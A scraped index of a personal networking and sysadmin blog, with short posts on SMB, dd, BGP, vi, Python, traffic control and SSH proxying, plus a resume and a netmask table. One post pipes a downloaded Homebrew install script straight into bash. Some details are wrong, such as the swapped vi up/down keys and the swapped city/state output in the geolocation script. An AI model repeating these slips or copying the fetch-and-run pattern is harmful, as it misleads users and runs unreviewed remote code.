While trying to mount a remote SMB directory on a CentOS 7.x server, this error happened:

[jemurray@linux-host ~]$ sudo mount -v -t cifs -o username=jemurray,vers=3.0  //192.168.16.8/jemurray /mnt
mount: //192.168.16.8/jemurray is write-protected, mounting read-only
mount: cannot mount //192.168.16.8/jemurray read-only

This was logged:

May 22 14:08:23 linux-host kernel: Status code returned 0xc000006d STATUS_LOGON_FAILURE
May 22 14:08:23 linux-host kernel: CIFS VFS: Send error in SessSetup = -13
May 22 14:08:23 linux-host kernel: CIFS VFS: cifs_mount failed w/return code = -13

To resolve the issue, the cifs-utils package needs to be installed:

Testing network perfomance using SMB, dd, and bypassing local disks on Linux

Sat, 23 May 2020 14:18:51 -0500

Summary

Bypass disk performance constraints by writing to /dev/null and reading from /dev/zero:

Write to /dev/null:

dd status=progress if=/path/to/largefile.img of=/dev/null bs=128M

Read from /dev/zero:

dd status=progress if=/dev/zero of=/path/to/largefile.img bs=100M count=1000

Details

Overview

Modern network infrastructure is no longer the congestion point when it comes to transferring data to and from a server. Disk I/O, which comprises the bus, controller, and disk speed, are typically the cause of poor performance.

By using /dev/zero and /dev/null, we can bypass poor performing disks to test the full capabilities of the network.

COVID19 helps leaders evaluate expanded work from home policies

Fri, 22 May 2020 13:31:11 -0500

The catalyst

For those individuals who work in a field where remote work is possible, the COVID19 pandemic has been a catalyst to test the feasibility of long-term work from remote policies. To leaders concerned if remote work can be successful, I will propose another way to look at this matter. The information in this post focuses on individuals who work in the IT field, although may apply to anyone able to do their job over a broadband Internet connection.

Using Ansible as a dynamic DNS update client

Thu, 21 May 2020 16:04:59 -0500

Overview

Here is an Ansible playbook to update dynamic DNS entires using AWS Route 53, which can be used as an alternative to dynamic DNS services such as afraid.org, noip.com, etc.

Configuration

Requirements

Install boto python library:

pip3 install boto

AWS Authentication and Authorization

Create the following environment variables by adding to your local shell configuration file such as the $HOME/.bashrc

AWS_ACCESS_KEY=<key goes here>
AWS_SECRET_KEY=<secret goes here>

Inventory file

Create an Ansible inventory file:

vi commands every engineer should know

Wed, 20 May 2020 11:53:15 -0500

Summary

The basics:
- Start: vi
- Insert: i
- Exit insert mode (to use movement keys): <esc>
- Left: h
- Up: j
- Down: k
- Right: l
- Save: <esc>:wq!

Details

Many heated debates have been had over editors, vi vs emacs, graphical vs. console, etc.

Any network or unix engineer worth their weight in salt should know vi. Why you ask? Unix-based systems with a CLI will have vi. It is simple, lightweight, works over a terminal or console session, and does not require any special dependencies.

Installing python libraries in a virtual environment using Visual Studio Code

Tue, 19 May 2020 08:19:34 -0500

Note: Instructions for creating python virtual environments in Visual Studio Code can be found here.

Open the terminal and type pip install infoblox-client:

Creating and using a Python virtual environment in Visual Studio Code

Mon, 18 May 2020 13:15:16 -0500

Python virtual environments allow developers to separate projects so that libraries do not conflict and projects can maintain separation with each other. Visual Studio Code makes it easy to create and switch between these environments.

First, create a new workspace (directory) for each unique Python virtual environment:

Create a new folder (directory):

Create a new python file:

Save the file with a .py extension:

Installing python3 on macOS using Homebrew (don't use the system version)

Sun, 17 May 2020 07:46:39 -0500

I recommend avoiding the version of python that comes preinstalled on macOS for the following reasons:

It is not the latest version
Older releases of macOS do not have python3
Adding packages / libraries may break system functionality
Separation of development vs. system

One of the easiest ways to install and manage the latest version of python3, and other software, is to use the Homebrew package manager.

Install Homebrew:

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)"

Install python3:

Swapping the control and caps lock key in OSX

Sat, 16 May 2020 10:45:27 -0500

To swap the control and caps lock keys in OSX enter system preferences -> keyboard -> modifier keys:

Swap the control and caps locks settings:

Why swap the control and caps lock key?

I use the control key more than the caps lock key (vi is my editor of choice).
The original control key is difficult to press with your fingers on the home row keys.
I started my career using a Sun keyboard, where control and caps lock were already in the proper position.

Fingers and hand have to stretch to reach the control key:

Using refresh on the Juniper CLI to repeat a command

Fri, 15 May 2020 10:29:02 -0500

Juniper CLI commands can be piped to | refresh in order to repeat the same action at a specific interval:

jemurray@900w-mmr-wu-rt-0> show interfaces ge-1/1/0 extensive | match err | refresh 5
---(refreshed at 2020-05-15 10:27:04 CDT)---
  Link-level type: Ethernet, MTU: 1514, MRU: 1522, LAN-PHY mode, Speed: 1000mbps, BPDU Error: None, MAC-REWRITE Error: None, Loopback: Disabled, Source filtering: Disabled,
  Input errors:
    Errors: 0, Drops: 0, Framing errors: 0, Runts: 0, Policed discards: 0, L3 incompletes: 0, L2 channel errors: 0, L2 mismatch timeouts: 0, FIFO errors: 0,
    Resource errors: 0
  Output errors:
    Carrier transitions: 0, Errors: 0, Drops: 0, Collisions: 0, Aged packets: 0, FIFO errors: 0, HS link CRC errors: 0, MTU errors: 2960, Resource errors: 0
    CRC/Align errors                         0                0
    FIFO errors                              0                0
    Total errors                             0                0
    Output packet error count                                 0
      Addresses, Flags: Is-Preferred Is-Primary
---(refreshed at 2020-05-15 10:27:09 CDT)---
  Link-level type: Ethernet, MTU: 1514, MRU: 1522, LAN-PHY mode, Speed: 1000mbps, BPDU Error: None, MAC-REWRITE Error: None, Loopback: Disabled, Source filtering: Disabled,
  Input errors:
    Errors: 0, Drops: 0, Framing errors: 0, Runts: 0, Policed discards: 0, L3 incompletes: 0, L2 channel errors: 0, L2 mismatch timeouts: 0, FIFO errors: 0,
    Resource errors: 0
  Output errors:
    Carrier transitions: 0, Errors: 0, Drops: 0, Collisions: 0, Aged packets: 0, FIFO errors: 0, HS link CRC errors: 0, MTU errors: 2960, Resource errors: 0
    CRC/Align errors                         0                0
    FIFO errors                              0                0
    Total errors                             0                0
    Output packet error count                                 0
      Addresses, Flags: Is-Preferred Is-Primary

Using public route servers and looking glass(es) to validate BGP prefix announcements

Thu, 14 May 2020 10:35:33 -0500

Public route servers and BGP looking glass(es) are used to validate BGP announcements. These tools are helpful to validate BGP changes are working as expected across the public Internet.

$ telnet router-server.he.net

route-server> show bgp ipv4 128.252.0.0/16
BGP routing table entry for 128.252.0.0/16
Paths: (23 available, best #11, table Default-IP-Routing-Table)
  Not advertised to any peer
  20115 2552 2552 2552
    216.66.24.70 from 216.218.252.82 (216.218.252.169)
      Origin IGP, metric 0, localpref 140, valid, internal
      Originator: 216.218.252.169, Cluster list: 216.218.252.82 216.218.252.184
      Last update: Wed Apr 29 15:57:23 2020

Web based looking glass from Internet2:

Using passive DNS to track down CDN traffic

Wed, 13 May 2020 12:38:41 -0500

Passive DNS is a historical log of DNS queries and the corresponding answers. This is helpful when reverse DNS does not return the original DNS query, for example:

Looking up the host download.windowsupdate.com returns a number of IP addresses:

jemurray@mbp-2019:~ $ host download.windowsupdate.com
download.windowsupdate.com is an alias for 2-01-3cf7-0009.cdx.cedexis.net.
2-01-3cf7-0009.cdx.cedexis.net is an alias for download.windowsupdate.com.edgesuite.net.
download.windowsupdate.com.edgesuite.net is an alias for a767.dspw65.akamai.net.
a767.dspw65.akamai.net has address 23.223.197.56
a767.dspw65.akamai.net has address 23.223.197.10
a767.dspw65.akamai.net has address 23.223.197.24
a767.dspw65.akamai.net has IPv6 address 2600:1407:a000::1730:d118
a767.dspw65.akamai.net has IPv6 address 2600:1407:a000::1730:d113

Turning the IP address back into the download.windowsupdate.com is the problem. Instead of returning download.windowsupdate.com, an Akamai record is returned:

Network path tracing commands

Tue, 12 May 2020 07:30:52 -0500

Description

The Internet is a large and complex aggregation of network hardware, connected by gateways. Tracking the route one’s packets follow (or finding the miscreant gateway that’s discarding your packets) can be difficult. traceroute use the IP protocol ‘time to live’ field and attempts to elicit an ICMP TIME_EXCEEDED response from each gateway along the path to some host. (Source: BSD man page)

Here are several variations, and examples of the traceroute command.

Linux caches MTU path maximum size

Mon, 11 May 2020 07:29:54 -0500

While troubleshooting a MTU path discovery issue, ping returned this error message: ping: local error: Message too long, mtu=1500 and tcpdump stopped logging ICMP packets egressing the interface.

Since this issue comes up on occasion and is not well understood, here is a brief explanation.

Examine the Linux MTU cache before MTU discovery:

[jemurray@wuit-s-00047 ~]$ sudo ip route get 104.131.191.87
104.131.191.87 via 128.252.5.114 dev p1p1 src 128.252.5.113
    cache

Sending a ping with MTU < 1500 bytes to validate the path is working as expected:

RSS feed reader for daily news and information consumption

Sun, 10 May 2020 07:50:18 -0500

I consume my daily news and information through Miniflux, the no-frills RSS feed reader.

The web interface works well on mobile as well as desktop.

Fever API integration is available to support alternative reader clients.

Example feed:

<soapbox> Why RSS? The Internet is designed to be decentralized, with the rise of large social platforms this concept is being eroded. Don’t get me wrong, I believe companies like Facebook and Twitter have their place as excellent platforms to connect with friends and family, but I don’t want them to be the only platforms to consume information. Curate your own knowledge sources and avoid the echo chamber we are slowly being lulled into.
</soapbox>

Using goaccess to analyze web server log files from the CLI

Sat, 09 May 2020 17:55:43 -0500

Goaccess is a real time CLI based web server log file analysis tool:

Start goaccess:

jemurray@shell:~$ goaccess /var/log/nginx/access.log

Example screeen shot:

DIY refilling a Lysol No-Touch dispenser

Fri, 08 May 2020 12:08:04 -0500

A simple DIY method to refill a Lysol No-Touch soap dispenser.

Tools and bulk refill soap:

Step one, drill the hole. Unlike the picture below, it is best to do this upside down so that debris does not fall into the container.

Step two, examine the hole and clean up any loose parts. I would recommend washing out the container to remove any loose parts that fell in during the drilling.

Template for taking notes during a meeting

Thu, 07 May 2020 11:12:25 -0500

Here is the default meeting note template I use in OneNote and EverNote. It has evolved over several years, but this version has stuck for a significant time. It allows for searches based on attendees, topics, dates, agenda, etc.

Date:

Typically filled in by the note-taking system (OneNote, EverNote, etc)

Scheduler / Requester:

The person who requested or schedule the meeting

Participants:

Full list of participants and any relevant information about them.
For example, title, department, vendor, etc.

Agenda / Goals:

The ordering of OmniGraffle stacks on the canvas

Wed, 06 May 2020 12:47:00 -0500

The order of layers in the right-hand column of OmniGraffle influences the stack order displayed on the canvas:

In the first example, the layer order is 1, 2, 3. This puts layer 1 on the top, layer 2 in the middle, and layer 3 on the bottom:

In the second example, the layer order is 3, 2, 1. This puts layer 3 on the top, layer 2 in the middle, and layer 1 on the bottom:

Using Python TextFSM to retrieve structured output from Cisco devices

Tue, 05 May 2020 16:40:31 -0500

Cisco’s lack of a robust API or the ability to return structured output from the CLI is a challenge when trying to automate networking configuration or retrieve telemetry information.

The Python module TextFSM attempts to resolve this deficiency by executing commands via the CLI and returning structured JSON formatted output.

Example Python script:

#!/usr/local/bin/python3

from netmiko import Netmiko
from getpass import getpass
import pprint

password = getpass()

output = []

net_connect = Netmiko(host="192.168.1.1", username="jemurray", password=password, device_type="cisco_ios")

net_connect.find_prompt()

output.append(net_connect.send_command("show version", use_textfsm=True))
output.append(net_connect.send_command("show interface GigabitEthernet1/0/1", use_textfsm=True))
output.append(net_connect.send_command("show interface GigabitEthernet1/0/12", use_textfsm=True))
output.append(net_connect.send_command("show vlan id 120", use_textfsm=True))


for i in output:
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(i)

Returned output:

Linux Traffic Control

Mon, 04 May 2020 18:31:46 -0500

Using the tc (traffic control) utility in Linux, it is possible to simulate various network conditions, such as latency, packet loss, random conditions, etc.

List existing `tc` rules:

sudo /usr/sbin/tc -p qdisc ls dev eth0

Delete existing `tc` rules:

sudo /usr/sbin/tc -p qdisc del dev eth0 root

Add vs. Change

If a rule does not already exist, use the add command option:

sudo /usr/sbin/tc qdisc add dev eth0 root netem delay 10ms

How to take a wide screen video on a cell phone

Sun, 03 May 2020 12:52:00 -0500

All modern television and computer displays are wide screen. When using a cell phone camera you must hold it horizonal to properly fill the screen.

Hold the camera hoizonal:

So that the video fills the screen:

Don’t hold the camera vertical:

About This Site

Sat, 02 May 2020 14:37:20 -0500

About Jason E. Murray

Me:

I am a father of two, technology pioneer, and lover of life. Everyday I work in some way to improve the lives of the people around me, the Internet, cyber security, and make the world a little bit better than I left it.

From the age of 10, I grew up in an online world, dialing into text-based BBSes, CompuServe, and AOL. It didn’t take long until my parents IBM PS2 and a dedicated phone line turned into a small-time WWIV BBS. I spent all my free-time learning about BBSes and what would soon become the public Internet.

Search

Sat, 02 May 2020 14:37:20 -0500

Using BGP to prefer Internet2 Connected Peers

Sat, 02 May 2020 10:22:58 -0500

Many universities and research institutions are connected to Internet2, a high-speed network that is similar to the commodity Internet but designed to support large data science network transfers.

By using BGP, institutions connected to multiple service providers and Internet2 can define policies that prefer prefixes learned over Internet2 peerings.

Influencing Outbound Traffic using Local-Preference

This section provides configuration examples of local-preference as the mechanism used to influence outbound traffic to prefer Internet2 connected peers over commodity Internet-connected peers.

Mosh (mobile shell) as a replacement for traditional SSH sessions

Fri, 01 May 2020 15:32:03 -0500

Mosh is used as a replacement for interactive SSH sessions. It converts the standard ssh session from TCP to UDP, allowing for stateless roaming, changing IP address in an active remote session, and resuming a session after traveling from work to home. It’s more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.

Install on a MAC: brew install mosh

For iOS (iPad, iPhone), I use Blink Shell with built-in Mosh support. This works well when traveling light and connected to a cellular hotspot. No need to worry about spotty signals or dropped connections. Mosh will automatically reconnect.

Simple web based file transfer utility based on WebRTC

Thu, 30 Apr 2020 12:03:20 -0500

Simple method to transfer a file from one device to another: https://webwormhole.io/

Desktop view:

Mobile view while transfering a photo to the desktop:

Obligatory xkdc on this topic:

Git Repo.

Covert epoch to a human readable format using awk

Wed, 29 Apr 2020 15:39:46 -0500

An awk one-liner to convert epoch time to a human readable format.

[jemurray@shell ~]$ cat epoch.txt
1587481133.293749	CYURHdG5l4jBhU1jb
1587481188.990734	CRgwN2HC3jQPMa7sb
1587481193.855005	Cvlbme4NPPzsfSt6b5
1587481189.016330	C7obDf1jt8z1KHjqj3
1587481194.005504	CF9KYf1gWR62iFMNne
1587481139.029608	CWzDwP38CVCi6Q51Mc
1587481194.031021	CRpEsP2TI9RakOH3x8
1587481193.930650	CeaRrR2MW98BzDcHB2
1587481194.038082	CuFe7L1WmdK38RZOH5
1587481193.821363	CZPKMp1CnuZuxBwsI3
1587480835.925876	CspNB64hKD2dr8fWv6
1587481060.840924	CpSIYC39p9q3lAZxG2

[jemurray@shell ~]$ cat epoch.txt | awk '{ printf "%s -- %s\n", strftime("%F %T",$1), $0 }'
2020-04-21 09:58:53 -- 1587481133.293749	CYURHdG5l4jBhU1jb
2020-04-21 09:59:48 -- 1587481188.990734	CRgwN2HC3jQPMa7sb
2020-04-21 09:59:53 -- 1587481193.855005	Cvlbme4NPPzsfSt6b5
2020-04-21 09:59:49 -- 1587481189.016330	C7obDf1jt8z1KHjqj3
2020-04-21 09:59:54 -- 1587481194.005504	CF9KYf1gWR62iFMNne
2020-04-21 09:58:59 -- 1587481139.029608	CWzDwP38CVCi6Q51Mc
2020-04-21 09:59:54 -- 1587481194.031021	CRpEsP2TI9RakOH3x8
2020-04-21 09:59:53 -- 1587481193.930650	CeaRrR2MW98BzDcHB2
2020-04-21 09:59:54 -- 1587481194.038082	CuFe7L1WmdK38RZOH5
2020-04-21 09:59:53 -- 1587481193.821363	CZPKMp1CnuZuxBwsI3
2020-04-21 09:53:55 -- 1587480835.925876	CspNB64hKD2dr8fWv6
2020-04-21 09:57:40 -- 1587481060.840924	CpSIYC39p9q3lAZxG2

Geolocating any IP address in a text file with Python

Tue, 28 Apr 2020 20:48:14 -0500

A Python script that will geolocate any IP address found in a text file.

The Python script:

#!/usr/local/bin/python3

# Uses the IP database: https://dev.maxmind.com/geoip/geoip2/downloadable/#MaxMind_APIs

import geoip2.database
import fileinput
import re

reader = geoip2.database.Reader('~/g/scripts/wustlPython/GeoLite2-City/GeoLite2-City.mmdb')

for line in fileinput.input():
    # Match any IPv4 address found
    ip = re.findall( r'[0-9]+(?:\.[0-9]+){3}', line )
    if ip:
        #print(ip)
        for i in ip:
            try:
                response = reader.city(i)
                country = response.country.name

                try:
                    state = response.subdivisions.most_specific.name
                except:
                    state = "none"

                try:
                    city = response.city.name
                except:
                    city = "none"

                print("IP: %s, Country: %s, State: %s, City: %s" % (i, country, city, state))

            except:
                next

Example input:

Debugging Regular Expressions with https://regex101.com

Mon, 27 Apr 2020 09:43:45 -0500

Anyone who writes Regular Expressions, needs a good way to test and debug the syntax.

https://regex101.com/ is in my short list of the top 5 tools I use regularly.

The first section contains the regular expression, the second section contains the test strings, and the section on the right explains what the regular expression is doing and the group matches.

Using marking and ranges in iMovie to quickly edit clips

Sun, 26 Apr 2020 13:10:26 -0500

marking and ranges make editing a video clip in iMovie simple.

Verify snapping is enabled, it helps to find the exact point during mouse over:

Select specific spots in the video clip by pressing m to mark:

Move the mouse to the mark, it will snap in place, press and hold r while dragging the mouse along the section to cut:

With this newfound skill you could be making spoof videos about the 2020 COVID19 toilet paper shortage for Boy Scouts:

Restarting the IS-IS process on Cisco NX-OS

Sat, 25 Apr 2020 17:57:54 -0500

One of our Cisco Nexus 7K’s ran into a problem where LDP would not establish neighbors and IS-IS was not advertising routes:

nx7k-MPLS# show mpls ldp neighbor
nx7k-MPLS#

nx7k-MPLS# show isis database level-2 ip prefix 192.168.247.154/32   ! This is the lo0 interface IP address
IS-IS Process: isis-config LSP database VRF: default
IS-IS Level-2 Link State Database
  LSPID                 Seq Number   Checksum  Lifetime   A/P/O/T

nx7k-MPLS#

The router hit a bug, but restarting IS-IS resolved the issue:

Using Bash functions to tab complete SSHing into hosts

Fri, 24 Apr 2020 14:30:05 -0500

SSH by tab-completing and proxying through a bastion host. I use this in a production environment where my team SSH’s into 1000’s of networking devices and unix systems.

By creating naming schemes, such as: buildingcode-floor-systemtype-uniqid it makes finding the host very simple. The file can be placed in a shared folder through Dropbox, Box, Google Drive, etc., referenced by a Bash source statement, and used by the entire team.

Example .bashrc file:

Improving vi usability on a MacBook Pro with the touch bar

Thu, 23 Apr 2020 13:34:58 -0500

The virtual ESC key on the MacBook Pro with a touch bar has much to be desired.

It can be made slightly better by increasing the size of the ESC key using Better Touch Tool.

Open the Better Touch Tool Configuration.

Create an Iterm2 App (because I only care about the escape key when in a terminal window).

Add the button and assign a title. In this example the button is called: THIS IS THE BIG ESCAPE KEY NEEDED TO MAKE VI WORK

Using telnet to find a devices current IP address

Wed, 22 Apr 2020 12:22:57 -0500

Using telnet to find a devices current IP address:

jemurray@mbp-2019:~ $ telnet telnetmyip.com
Trying 2600:1f16:b9f:7d16::100...
Connected to telnetmyip.com.
Escape character is '^]'.
{


"comment": "##     Your IP Address is 2600:6c40:7e80:2515:e4c0:4484:93e6:a62b (62588)     ##",


"family": "ipv6",
"ip": "2600:6c40:7e80:2515:e4c0:4484:93e6:a62b",
"port": "62588",
"protocol": "telnet",
"version": "v1.2.0",
"website": "https://github.com/packetsar/checkmyip",
"sponsor": "Sponsored by ConvergeOne, https://www.convergeone.com/"
}
Connection closed by foreign host.

Using PerfSonar pscheduler to initiate remote speed tests with Iperf3

Tue, 21 Apr 2020 09:29:03 -0500

The PerfSonar pscheduler tool can be used to initiate tests, such as iperf3, on remote servers:

[jemurray@ps-eps-l29-1 ~]$ pscheduler task --tool iperf3 throughput -d bost-pt1.es.net -t 10
Submitting task...
Task URL:
https://localhost/pscheduler/tasks/0c661c85-fc6c-4065-a300-f2d58b5af123
Running with tool 'iperf3'
Fetching first run...

Next scheduled run:
https://localhost/pscheduler/tasks/0c661c85-fc6c-4065-a300-f2d58b5af123/runs/0e8d3de0-caf2-479d-a43b-1625f3bdcfb9
Starts 2020-04-21T14:35:48Z (~6 seconds)
Ends   2020-04-21T14:36:07Z (~18 seconds)
Waiting for result...

* Stream ID 5
Interval       Throughput     Retransmits    Current Window
0.0 - 1.0      4.89 Gbps      36             67.17 MBytes
1.0 - 2.0      8.35 Gbps      0              67.17 MBytes
2.0 - 3.0      8.44 Gbps      0              67.17 MBytes
3.0 - 4.0      8.41 Gbps      0              67.17 MBytes
4.0 - 5.0      8.59 Gbps      0              67.17 MBytes
5.0 - 6.0      8.47 Gbps      0              67.17 MBytes
6.0 - 7.0      8.66 Gbps      0              67.17 MBytes
7.0 - 8.0      8.60 Gbps      0              67.17 MBytes
8.0 - 9.0      8.47 Gbps      0              67.17 MBytes
9.0 - 10.0     8.57 Gbps      0              67.17 MBytes

Summary
Interval       Throughput     Retransmits
0.0 - 10.0     8.14 Gbps      36

No further runs scheduled.

Monitor for BGP changes using BGPalerter

Mon, 20 Apr 2020 17:10:20 -0500

BGPalerter is a free and opensource way to monitor for changes in public BGP announcments. It is an alternative to BGPmon.

Initial Setup (first run):

jemurray@shell:~$ ./bgpalerter-linux-x64
Impossible to load config.yml. A default configuration file has been generated.
BGPalerter, version: 1.24.0 environment: production
Loaded config: /home/jemurray/config.yml
? The file prefixes.yml cannot be loaded. Do you want to auto-configure BGPalerter? Yes
? Which Autonomous System(s) you want to monitor? (comma-separated, e.g. 2914,3333) 2552
? Are there sub-prefixes delegated to other ASes? (e.g. sub-prefixes announced by customers) No
? Do you want to be notified when your AS is announcing a new prefix? Yes
Generating monitoring rule for 192.31.46.0/24
Generating monitoring rule for 128.252.7.0/24
Generating monitoring rule for 2606:fd80::/32
Generating monitoring rule for 2604:3e00::/32
Generating monitoring rule for 128.252.25.0/24
Generating monitoring rule for 128.252.0.0/16
Generating monitoring rule for 128.252.48.0/24
Generating monitoring rule for 65.254.96.0/19
Generating monitoring rule for 65.254.109.0/24
Detected more specific 128.252.7.0/24
Detected more specific 128.252.25.0/24
Detected more specific 128.252.48.0/24
Detected more specific 65.254.109.0/24
Generating generic monitoring rule for AS 2552
WARNING: The generated configuration is a snapshot of what is currently announced. Some of the prefixes don't have ROA objects associated or are RPKI invalid. Please, verify the config file by hand!
Done!
Monitoring 128.252.0.0/16
Monitoring 65.254.96.0/19
Monitoring 192.31.46.0/24
Monitoring 2604:3e00::/32
Monitoring 2606:fd80::/32
Monitoring AS 2552

Restarting:

Using ovftool to copy VM hosts

Sun, 19 Apr 2020 14:57:12 -0500

OVFTool can be used to copy VM hosts from one ESXi server to another via the CLI.

Download OVF Tool

jemurray@home-server:~$ ovftool -ds=datastore0 vi://root@192.168.86.55/VIRL vi://root@192.168.86.2
Enter login information for source vi://192.168.86.55/
Username: root
Password: *********
Opening VI source: vi://root@192.168.86.55:443/VIRL
Enter login information for target vi://192.168.86.2/
Username: root
Password: *********
Opening VI target: vi://root@192.168.86.2:443/
Deploying to VI: vi://root@192.168.86.2:443/

-ds = the destination datastore name

Using SSH as a SOCKS proxy

Sat, 18 Apr 2020 13:41:14 -0500

SSH can function as a SOCKS proxy with the following command:

ssh -D 5555 -q -C -N shell.jasonmurray.org

In the following examples, I used SwitchyOmega as the plugin to change the proxy settings.

Configure the browser with the proxy:

AutoProxy is enabled for specific sites, otherwise bypass the proxy and fetch directly:

A new beginning

Fri, 17 Apr 2020 11:31:25 -0500

It is time to get back into sharing. I have been running this website under various names and frameworks for more then two decades, some of which is embarrassing to acknowledge. Other priorities, kids, work, and the need for perfection has kept me from sharing.

Welcome to the genesis of Today I Shared. The concept is loosely based on the Today I Learned structure, which is simple and to-the-point posts.

I enjoy learning and then writing about technology, leadership, DIY projects, electronics, or anything else that may be helpful to a wider audience.

Resume

Sun, 09 Feb 2020 15:53:23 -0600

Objective

Leverage my extensive leadership, architecture, engineering, and operations experience to develop strategic direction and enable teams of highly motivated engineers to deliver exceptional quality Internet services in large complex environments. My principal areas of interest include large research institutions or innovative organizations involved in disruptive Internet technology.

Executive Summary

Over 25 years of experience with designing, implementing, and maintaining large scale server, network, wireless, and security services.
Architectural principals focus on ease of use, scalability, reliability, and open standards capable of supporting a broad range of devices.
Systems Architect with an in-depth understanding of system design, low-level internals, security, troubleshooting, and performance tuning on mission-critical systems.
Network Architect with an in-depth knowledge of data network design from access to edge, routing protocols, performance tuning, and troubleshooting.
In-depth knowledge of key protocol standards such as RFC, BCP, and IETF.
Excellent problem-solving skills with an acute ability to find and research unfamiliar issues.
Strong communication and presentation skills.

Experience Summary (not all-inclusive)

Operating Systems: Apple (macOS, iOS, Android, BSD, Cisco (Catalyst, IOS, NX-OS), GNU/Linux, HP, JunOS, Microsoft, Solaris, SunOS
Virtualization Technologies: CML, Docker, GNS3, Solaris Containers, VirtualBox, VMware
Cloud Providers: AWS, Azure, Digital Ocean, Linode, Google Cloud
System Hardware: Arista, Cisco, Dell, HP, Infoblox, Juniper, Meraki, Sun, Xiotech, x86
Core Server and Networking Protocols: arp, bgp, dhcp, dns, ethernet, ftp, git, hsrp, http, icmp, imap, ip, ipsec, is-is, ldp, mp-bgp, mpls, nat, nfs, nis, nnrp, nntp, ntp, ospf, pcap, pop3, ppp, radius, sip, smtp, snmp, stp, ssh, ssl, tcp, tftp, udp, vlan, vpn, vrrp, vxlan
Programming Languages: C, Perl, PHP, Python, shell, SQL, TCL, x86 assembly
Automation Languages and Frameworks: Ansible, Napalm, Netmiko, Nornir, Puppet, Python, RESTful

Employment History

Infrastructure Architect
Washington University in St. Louis
April 2016 to present

Internet2 Technology Exchange: WashU MPLS Presentation

Thu, 12 Dec 2019 09:30:06 -0500

On 2019-12-12 I presented on the Washington University in St. Louis One Campus enterprise MPLS design at the Internet2 Tech-Exchange.

SESSION ABSTRACT

OVERVIEW

A journey through the Washington University in St. Louis “One Campus Project”, the birth of our MPLS network, and the adoption and adaptation of security controls from the National Institute of Standards and Technology (NIST).

Problem Statement

The technology landscape across the university has been changing at a rapid pace. Significant events, such as the consolidation of the Medical School Central Information Technology (MSCIT) and the academic campus Information Services and Technology into the single organization known as WashU IT and the reorganization of operational and help desk entities, have caused strain on the simplicity, scalability, reliability, security, and operational support of the core networking infrastructure. The main source of problems stem from the legacy environments that continue to be operated as if they were independent entities, with their own policy, procedures, tools, and configurations standards. This lack of vision requires our engineering and operation staff to continually architect ad-hoc solutions to bridge these environments together in ways that were never intended by their original designers.

IPv4 Netmasks Expanded

Mon, 28 Jan 2019 12:42:49 -0600

A subnet calculator, such as http://www.routemeister.net/projects/sipcalc/, is an invaluable tool. Sometimes a quick reference sheet works better. Here are the most common IPv4 subnets expanded:

Netmask         Netmask                                 (binary) CIDR Notes
255.255.255.255 11111111.11111111.11111111.11111111 /32 Host (single address)
255.255.255.254 11111111.11111111.11111111.11111110 /31 Unuseable
255.255.255.252 11111111.11111111.11111111.11111100 /30 2 useable
255.255.255.248 11111111.11111111.11111111.11111000 /29 6 useable
255.255.255.240 11111111.11111111.11111111.11110000 /28 14 useable
255.255.255.224 11111111.11111111.11111111.11100000 /27 30 useable
255.255.255.192 11111111.11111111.11111111.11000000 /26 62 useable
255.255.255.128 11111111.11111111.11111111.10000000 /25 126 useable
255.255.255.0   11111111.11111111.11111111.00000000 /24 "Class C" 254 useable



Netmask 255.255.255.0 /24 (11111111.11111111.11111111.00000000)
1 subnet
LOW IP       HI IP
x.x.x.0      x.x.x.255

Netmask 255.255.255.128 /25 (11111111.11111111.11111111.10000000)
2 subnets
LOW IP       HI IP
x.x.x.0      x.x.x.127
x.x.x.128    x.x.x.255

Netmask 255.255.255.192 /26 (11111111.11111111.11111111.11000000)
4 subnets
x.x.x.0      x.x.x.63
x.x.x.64     x.x.x.127
x.x.x.128    x.x.x.191
x.x.x.192    x.x.x.255

Netmask 255.255.255.224 /27 (11111111.11111111.11111111.11100000)
8 subnets
x.x.x.0      x.x.x.31
x.x.x.32     x.x.x.63
x.x.x.64     x.x.x.95
x.x.x.96     x.x.x.127
x.x.x.128    x.x.x.159
x.x.x.160    x.x.x.191
x.x.x.192    x.x.x.223
x.x.x.224    x.x.x.255

Netmask 255.255.255.240 /28 (11111111.11111111.11111111.11110000)
16 subnets
x.x.x.0      x.x.x.15
x.x.x.16     x.x.x.31
x.x.x.32     x.x.x.47
x.x.x.48     x.x.x.63
x.x.x.64     x.x.x.79
x.x.x.80     x.x.x.95
x.x.x.96     x.x.x.111
x.x.x.112    x.x.x.127
x.x.x.128    x.x.x.143
x.x.x.144    x.x.x.159
x.x.x.160    x.x.x.175
x.x.x.176    x.x.x.191
x.x.x.192    x.x.x.207
x.x.x.208    x.x.x.223
x.x.x.224    x.x.x.239
x.x.x.240    x.x.x.255

Netmask 255.255.255.248 /29 (11111111.11111111.11111111.11111000)
32 subnets
x.x.x.0      x.x.x.7
x.x.x.8      x.x.x.15
x.x.x.16     x.x.x.23
x.x.x.24     x.x.x.31
x.x.x.32     x.x.x.39
x.x.x.40     x.x.x.47
x.x.x.48     x.x.x.55
x.x.x.56     x.x.x.63
x.x.x.64     x.x.x.71
x.x.x.72     x.x.x.79
x.x.x.80     x.x.x.87
x.x.x.88     x.x.x.95
x.x.x.96     x.x.x.103
x.x.x.104    x.x.x.111
x.x.x.112    x.x.x.119
x.x.x.120    x.x.x.127
x.x.x.128    x.x.x.135
x.x.x.136    x.x.x.143
x.x.x.144    x.x.x.151
x.x.x.152    x.x.x.159
x.x.x.160    x.x.x.167
x.x.x.168    x.x.x.175
x.x.x.176    x.x.x.183
x.x.x.184    x.x.x.191
x.x.x.192    x.x.x.199
x.x.x.200    x.x.x.207
x.x.x.208    x.x.x.215
x.x.x.216    x.x.x.223
x.x.x.224    x.x.x.231
x.x.x.232    x.x.x.239
x.x.x.240    x.x.x.247
x.x.x.248    x.x.x.255

Netmask 255.255.255.252 /30 (11111111.11111111.11111111.11111100)
64 subnets
LOW IP       HI IP
x.x.x.0      x.x.x.3
x.x.x.4      x.x.x.7
x.x.x.8      x.x.x.11
x.x.x.12     x.x.x.15
x.x.x.16     x.x.x.19
x.x.x.20     x.x.x.23
x.x.x.24     x.x.x.27
x.x.x.28     x.x.x.31
x.x.x.32     x.x.x.35
x.x.x.36     x.x.x.39
x.x.x.40     x.x.x.43
x.x.x.44     x.x.x.47
x.x.x.48     x.x.x.51
x.x.x.52     x.x.x.55
x.x.x.56     x.x.x.59
x.x.x.60     x.x.x.63
x.x.x.64     x.x.x.67
x.x.x.68     x.x.x.71
x.x.x.72     x.x.x.75
